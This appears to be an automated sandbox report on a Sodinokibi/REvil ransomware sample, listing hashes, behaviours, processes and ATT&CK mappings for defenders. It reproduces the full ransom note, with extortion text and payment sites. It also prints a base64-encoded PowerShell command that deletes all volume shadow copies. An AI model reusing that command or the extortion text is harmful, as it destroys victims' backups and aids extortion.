Analysis

  • max time kernel
    103s
  • max time network
    108s
  • platform
    windows10-1703_x64
  • resource
    win10-20230703-en
  • resource tags
    arch:x64, arch:x86, image:win10-20230703-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    09-08-2023 07:35

General

  • Target

    adb.vbs.exe

  • Size

    116KB

  • MD5

    b86ad4241b01376b3924a380f6f4c934

  • SHA1

    10682d08a18715a79ee23b58fdb6ee44c4e28c61

  • SHA256

    14c8e3f1f23d16c2c9a4272cd05d00461d27b372cc5f588b4bbfc6102bbed708

  • SHA512

    54fd19cfc37255e7ddf3456d1a2989558522cf58e5eee6ca916c19542921fe3ba4e7a431a35e0e1edbfc37c5651d392e7c3c54eb408754c0488021b16fdf92c9

  • SSDEEP

    1536:aTZINbRh0SKws6KTUkmHlntMvfWhbpfCqeICS4AKvQIFlswOmZFS0cnwpIGmQwB:FRix3PWhNlOVFmw5q0cifmQ

Score
10/10

Malware Config

Extracted

  • Path
    C:\Recovery\y389ng9-readme.txt

  • Family
    sodinokibi

  • Ransom Note

    ---=== Welcome. Again. ===---

    [+] Whats Happen? [+]

    Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension y389ng9. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

    [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/125?s=7ee0235fc7f67403393ad971dea5809e

    [+] What guarantees? [+]

    Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

    [+] How to get access on website? [+]

    You have two ways:

    1) [Recommended] Using a TOR browser!
       a) Download and install TOR browser from this site: https://torproject.org/
       b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/21224F673EBCC2FE

    2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
       a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
       b) Open our secondary website: http://decryptor.cc/21224F673EBCC2FE

    Warning: secondary website can be blocked, thats why first variant much better and more available.

    When you open our website, put the following data in the input form:

    Key:
    XIyfqvnngpePFBCMlX9/h3zroE/yqjPLhfjbw04BL60+1p7Q3i57jpfSNjyWXSMA
    R5oeCqyXLFdbBzkfkcgc8rfOIOYydlQUzvK6cdWFo2c8RyDPSHhJ1jYCE/+QcUzd
    bBrd1WFEG66gmT5HT3yyd8qGtx4UyqRtUyy6lzEWl/KPpMmETegN9O0owevVC3EI
    M3n1RGBCMQkgtFx9ACxkGoQHjQzLXdGlTnOhXdvIKSoe0ZTtnYFFOHY8z0TYORP+
    T8dyB/DvFeBAvhUitmOrjkDpXQwyfZZcMaw0zPudKSDvxbZePYLM3ryA3oX4mObm
    E7hnU8Y4JPJCJjkUCzs8O64iQUIzS9Or9kOu4NAmJuNFLk/eWJaKmBpD2EERnbiL
    2pjJKQcpPr2/QNgm4TMsHzpfs+XBhxH3UuFE6JzPYjclGs1mG0ajuk/ga4QkIAMh
    Z3M2BUFg+xH3R/fdQLbWWPCsZ5c1KNirlyZFBuIV3xtSxe16JZXSIed5AbJjYzA+
    DpUQeuSTRwFJdL/8elt94n1+tEtDJmmn24gICVNZsx26qQ/s64u8FQiO93THp662
    jZjmUuoiTWnATmVJzHsxubpKTEeIsSZnAQ7p05jn7Kq9IvW6l7buXEiNjSo/egpv
    Dyg4ghnrsh4TxQE7R5bT2OuyQTCKlALF33LxE03jVhmMM5fqfKIqHszrOsD1/njr
    +LsqpwvvEB22PMf+LfhGJ9Jcu5pPriJRLhS03I0J3adLU19NkXxreg8bSmu/NIbd
    2GoM7bTmARRx2IXE1Etxc6HNKe6YN9TlB5rTPXYTGUEpFzRqNu2a0fAr0XPgUNXJ
    I2vIAMNfj9wStwLf5yiKLsGVb4i05GYiHRv2t42DdTzpgfjkndfTGwO/qTCzXRRr
    lXjCIaVTWbdgt7qDgVET4ATIVejsxqmKr4D87iv6nPMO91TN765p73IXg+wM2RnL
    3R0VxTk6CJjleJQFnpcbfIS6Td1TzsH6pV7qITxdcXSZwKvotChrCFHfV2o518oH
    fUEQKcsNNR1d13WaD0sAsFvBKKLxk22f1nnfqnBhmdJjzVB+o5laxISS2LK3vqod
    u1PaNT09fZQ7m+19GhSVQr52F+ckcGDcKOCjKsUlOvfnCJGv73aXV26RoCuIWT5P
    dFZKj7eDpKSyC0tUvSh/4K30qXPgoHOkTf1QvaXua4OAX+p5SiCwahuTdigobaKm
    +SZImSwJb4LY/Nu6tOJIV6LCy5pAQpdtmFz+V19TOAEqfDwNhOad8ZGwrFwX8KPh
    5KDqexe0GOuJ4GkD0tBQMXut9gnCzB+GNJr2ygP5ZQ9HFsVJPlbNhv/rGEuUAY3a
    XzfXGCkaJFaph8k8xpSKWzEtCfrfmCLh2L8=

    -----------------------------------------------------------------------------------------

    !!! DANGER !!!
    DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
    !!! !!! !!!
    ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
    !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/21224F673EBCC2FE

http://decryptor.cc/21224F673EBCC2FE

Signatures

  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives (3 TTPs, 25 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory (1 IoC)
  • Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  • Drops file in Program Files directory (29 IoCs)
  • Suspicious behavior: EnumeratesProcesses (5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (6 IoCs)
  • Suspicious use of WriteProcessMemory (2 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe
    "C:\Users\Admin\AppData\Local\Temp\adb.vbs.exe"
    PID: 2472
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child process)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      PID: 524
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID: 3004
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    PID: 312
    • Suspicious use of AdjustPrivilegeToken

Network

MITRE ATT&CK Matrix (ATT&CK v13)

  • Defense Evasion
    • Modify Registry (T1112): 1
  • Discovery
    • Query Registry (T1012): 1
    • Peripheral Device Discovery (T1120): 1
    • System Information Discovery (T1082): 1
  • Impact
    • Defacement (T1491): 1


Downloads

    • C:\Recovery\y389ng9-readme.txt
      Filesize

      7KB

      MD5

      315a645f7839ddbcd016707e1b4d45ee

      SHA1

      5daf7c0c9d77b570cf79b05ab76480c554d96533

      SHA256

      6096b71a6e304b55b1a9b7fe95d817bac6873074044eb8ca031d9ecf09208d7c

      SHA512

      0b1635340d8f16eeacae8fa9d5814552efa56600deefd4e843c1b03e203d241ed93d3a26a8469e4c2a89561e4a4241b1061298793372762faa1ec47a47fd146b

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ild5rgem.5rx.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      181KB

      MD5

      a0857f2a9a01a6355b6b1f741ea937b6

      SHA1

      a8b8baaee9163756ab9d33b59dd42c9d00981017

      SHA256

      18ff76c2ea7e0f81d846b674c2f314b4d257ce2c1fe042593e3f22b0845c1019

      SHA512

      0f245aa721fc25a9487c45d61626439ae9ac46f57eaf4c34953e7252f0672fec4d20a1e82266d9ed7ab4b212bc690038d16d5a018ee43b675a84c4c9cf91d967

    • memory/524-124-0x0000018DF6480000-0x0000018DF64A2000-memory.dmp
      Filesize

      136KB

    • memory/524-131-0x00007FFF6DE70000-0x00007FFF6E85C000-memory.dmp
      Filesize

      9MB

    • memory/524-132-0x0000018DDDD30000-0x0000018DDDD40000-memory.dmp
      Filesize

      64KB

    • memory/524-133-0x0000018DDDD30000-0x0000018DDDD40000-memory.dmp
      Filesize

      64KB

    • memory/524-136-0x0000018DF6730000-0x0000018DF67A6000-memory.dmp
      Filesize

      472KB

    • memory/524-155-0x0000018DDDD30000-0x0000018DDDD40000-memory.dmp
      Filesize

      64KB

    • memory/524-159-0x00007FFF6DE70000-0x00007FFF6E85C000-memory.dmp
      Filesize

      9MB